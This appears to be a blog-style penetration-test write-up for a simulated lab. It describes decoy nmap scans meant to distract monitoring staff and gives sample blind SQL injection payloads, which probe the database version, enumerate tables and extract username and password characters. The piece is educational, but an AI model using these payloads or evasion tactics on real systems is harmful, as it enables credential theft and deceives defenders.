Going Blind and finding your way
An assignment is requested as follows.You are required to conduct a pentest on a clients simulated research and Development Lab environment.While being debriefed,you get to interact with the network administrator who happens to be a Cisco Expert and Snort Certified Professional who has set up the militarized test environment with state of the art security defense mechanisms .Moreover,you get to know that they recently installed a web based firewall.You are required to compromise the installation so as to enable the organisation secure itself against future risk exposures.
Deliverable:Own the BOX
ssvforensic labs:Tool Kit for this operation not limited to;
Case Undisclosed company Y
411 about the firm ERP Software Development
Mission Pita_Katikati_Yao
Objective Pawn and Own
RV choice Kali Linux[Burp Suite/Zap,Sql Cheat-sheet,WebShell,Hosting,Tcpdump & FireBug]
POC Samples BelowSAMPLE OF THE THEORETICAL POC METHODOLOGY
The tactics and strategies used by a shaolin disciple during combat are intelligent application generalized by some of the best warriors in the past
This is synonymous with **Ancient Principles for future Battle Fields**the BackTrack Mantra.The below can be summarised as the 5 rules of thumb for any Whitehat,Black hat or GreyHat not to forget our RedHat buddies from Odays ago,the Oracle is listening.......
RULES OF THUMB
- Signal to the East,strike to the West;
- Avoid an opponents strong points,strike the weak ones;
- Trick an opponent into advancing without success
- If an opponent is strong,enter from the side, if weak,enter from the front
- USE MINIMUM FORCE to neutralize maximum strength.
Layered Defence Approach adopted versus a potential threat via sql injection
SAMPLE OF THE THEORETICAL SETUP METHODOLOGY
After carefully assessing (Rule No 2&4),going for the web server was logical than the other options which were highly monitored.Now to fool the technical team monitoring the systems,we install a 4 custom vm setups(we only discuss two for reason known to us),one thats host based and the other with "custom virtual network" to be used as a decoy when running the automated scan using nmap,we also deliberately fail to flag nmap from doing a stealth scan and we also set -p to 1-65500, the aim being we need the administrators to pay more attention on the IPS and IDS(Rule No 1).We also create a cron job for our bash script on one of the vm to loop other scans as well as nmap(Rule No 3)
SAMPLE OF THE BLIND SQL INJECTION POC
Using (Rule N0 5),a sample of the blind sql injections used to own the box.
http://xxxxxxxxxxx/and 1=1
and 1=2 <--- Boolean false -- and 1=1 <--- Boolean true -- The page loads
The mysql version 5:To get the version in blind attack we use "substring."
http://xxxxxxxxxxx/and substring(@@version,1,1)=5
Getting database tables and columns we use limit 0,1
http://xxxxxxxxxxx/and (select 1 from mysql.table limit 0,1)=1
our query here returns 1 row of data since sub select returns only 1 row
We now use the above method to continuous get more tables and columns.
Pulling Charactors from the users tables
ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80
When > 0 returns false we know that we have reach the end.We later use the ascii converter to know what the strings are and come up with letters
Conclusions
According to OWASP TOP 10 2013 injections are the number one threat facing systems.Below is an illustration of injections and impact on to the business.
As security analyst and penetration tester,OWASP has provided a framework as a baseline for testing,to help developers, testers, and application security specialists understand how to efficiently and effectively test the security of web applications.for more info click here.
For application pen tester's wanting to get their hands dirty,try mutillidae and burp suite as your test environment and the rest as they say is history.I wish to remind you that as a security analyst, seek to provide an acceptable level of security for your client by emphasizing that the word secure does not exist in our current world.
Special Thanks:Credits for reference from OSAWP & Sun Tzu(Art of War) my Defacto Mentor